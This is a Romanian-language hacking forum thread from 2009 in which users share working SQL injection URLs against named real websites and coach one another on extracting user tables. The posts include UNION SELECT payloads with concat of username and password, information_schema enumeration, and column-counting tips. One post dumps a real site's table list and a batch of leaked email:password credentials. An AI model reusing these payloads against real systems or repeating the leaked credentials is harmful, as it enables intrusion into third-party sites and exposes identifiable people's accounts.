redking Posted February 1, 2009 Report Posted February 1, 2009 care a fost site-ul cu cel mai mare numar de coloane pe care l-ati prins?shi cate? Quote
redking Posted February 2, 2009 Report Posted February 2, 2009 http://www.e-juridic.ro/index.php?pag=show_prod&pid=1+union+all+select+1,concat(userid,0x3a,id,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+user Quote
redking Posted February 2, 2009 Report Posted February 2, 2009 http://www.physikinstrumente.com/en/news/fullnews.php?newsid=1+union+all+select+1,2,3,concat(username,0x3a,password),5,6,7+from+user Quote
Flubber Posted February 9, 2009 Author Report Posted February 9, 2009 voi reusiti sa aflati ceva mai mult de la site-u asta (http://www.luccatourist.it/notizie.php?id=230)am reusit decat versiunea: http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--daca puteti mai multe....postatithx Quote
Guest Praetorian Posted February 9, 2009 Report Posted February 9, 2009 voi reusiti sa aflati ceva mai mult de la site-u asta (http://www.luccatourist.it/notizie.php?id=230)am reusit decat versiunea: http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--daca puteti mai multe....postatithxDaca aflai versiunea iti dadeai seama ce sa faci!!Foloseai unhex(hex(version()))[Database]aptlucca[Tables of DB]NL_iscritti,NL_iscritti_gruppi,NL_messaggi,NL_messaggi_gruppi,NL_opzioni,_NL_messaggi_gruppi,_OLDNL_iscritti,_OLDNL_iscritti_gruppi,_OLDNL_messaggi,_aat_1,_aat_2,_aat_3,_banner_copy,_banner_old,banner,banner_altritesti,comuni,costanti,diario,dv_foto,dv_viaggi,dv_voti,eventi,foto,foto_carrello,foto_categorie,foto_gruppi,foto_richieste,fotoxcategorie,guide,informazioni,informazioni_gruppi,itinerari,links,links_gruppi,mappe,notizie,notizie_copy,poster,pubblicazioni,ristoranti,ristoranti_gruppi,ristoranti_gruppi_unione,s_comunicati,s_rassegna,salastampa,salastampa_categorie,salastampa_foto,sezioni,stampa,stampadoc,strutture,strutture_gruppi,testi,testi_introduttivi,utenti,v_foto,visitare,visitare_gruppi,zone[columns of utenti]idutente,userid,password,denominazione,testata,professione,approvato,t_admin,t_sito,t_newsletter,t_stampa,t_viaggi,ultimologin,tipo,data,ora,email[ Email , Password ]comunicazione@luccaturismo.it:3hc5eneb,emilio.orsi@lucense.it:evtcunv0,sbresdin@orange.fr:usxo7zsd,s.wiedenstritt@doradocom.com:ca2sp50d,riccardo.oldani@itinerarieluoghi.it:vcio4jts,andrea.mariani@lucense.it:lunet,restivo.renee@gmail.com:7xrdfbib,vania.brogi@tiscali.it:wbr4raxn,d.deponti@alice.it:qgugod5r,dhayes@emphasis.net:0ahmipj4,emilio.orsi@lucense.it:ztue557j,emilio.orsi@lucense.it:qps5yc00 Quote
redking Posted February 9, 2009 Report Posted February 9, 2009 cum ai ghicit numele tabelelor? cu ceva program nu? Quote
paxnWo Posted February 9, 2009 Report Posted February 9, 2009 versiunea e 5 : http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--inseamna ca avem information_schema. Quote
redking Posted February 9, 2009 Report Posted February 9, 2009 versiunea e 5 : http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--inseamna ca avem information_schema.da paxnWo stiu treaba asta....dar nu stiu sa extrag manual tabelele din information_schema...L.E.:m-am documentat si am invatzat cum se extrag manual datele din information_schema...mai dura e faza daca apar magic_quotes-urile... 1 Quote
redking Posted February 10, 2009 Report Posted February 10, 2009 cu ce mi-am batut capu` ---->materia prima:http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=0x6170746c75636361+and+table_name=0x7574656e7469si produsul finit:http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(email,0x3a,password))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+utenti Quote
Flubber Posted February 11, 2009 Author Report Posted February 11, 2009 Daca aflai versiunea iti dadeai seama ce sa faci!!Foloseai unhex(hex(version()))scuze, am uitat sa inlocuiesc in link o cifra (vulnerabila) cu unhex(hex(@@version))da paxnWo stiu treaba asta....dar nu stiu sa extrag manual tabelele din information_schema...exact la fel, cand am incercat sa citesc "information_schema.schemata" imi dadea eroare Quote
redking Posted February 11, 2009 Report Posted February 11, 2009 http://www.saints.co.nz/players.php?id=1+and+substring(@@version,1,1)=4 ....am facut multe incercari de a gasi tabelu` cu userii dar degeaba.... Quote
brugner Posted February 14, 2009 Report Posted February 14, 2009 Hello,Un pic de ajutor daca este posibil...Dupa interogari de genu "union all select 1" (am verificat cu order by..numai o coloana este) imi returneaza numai "The used SELECT statements have a different number of columns" Stie cineva despre ce e vorba? Quote
redking Posted February 14, 2009 Report Posted February 14, 2009 inseamna ca nu ai gasit numaru corect al coloanelor....decat sa incerci cu order by....mai bine incearca "union+all+select+1,2,3,...." tot adaugi pana cand vei vedea ca nu-ti mai da eroarea de genu "the selected statement....."...iti afiseaza altceva....daca nu intelegi da-mi un pm cu id-u tau...si te ajut.... Quote
brugner Posted February 14, 2009 Report Posted February 14, 2009 inseamna ca nu ai gasit numaru corect al coloanelor....decat sa incerci cu order by....mai bine incearca "union+all+select+1,2,3,...." tot adaugi pana cand vei vedea ca nu-ti mai da eroarea de genu "the selected statement....."...iti afiseaza altceva....daca nu intelegi da-mi un pm cu id-u tau...si te ajut....Mersi mult pentru ajutor... pana sa ma "luminez" eu au patch-uit problema ... Quote
Guest Praetorian Posted February 14, 2009 Report Posted February 14, 2009 La majoritatea site-urilor vuln sql.. daca iti arata la order by 1-- cumva ,iar la order by 2-- diferit inseamna ca are doar 1 coloana.link-ul tau de ex este:index.php?id=12 union all select 1--Se poate sa nu iti returneze nimic, sau eroarea normala.In loc de 1 pui [ version() ], chiar daca nu iti apare, te uiti in sursa pagini.Daca nu o gasesti nici acolo pui un " - " in fata lui 12.index.php?id=-12 union all select 1--Daca nici acum nu iti merge trebuie sa folosesti unhex(hex(version()))ex:index.php?id=-12 union all select unhex(hex(version()))--Daca nici acum nu merge inseamna ca nu poti folosi sqli si trebuie sa faci blind sqli. Quote
redking Posted February 14, 2009 Report Posted February 14, 2009 poti face foarte multe incercari pe un sql vulnerabil....am gasit multe diferente in abordarea interogarilor....oricum...ma bucur ca ai rezolvat problema.... Quote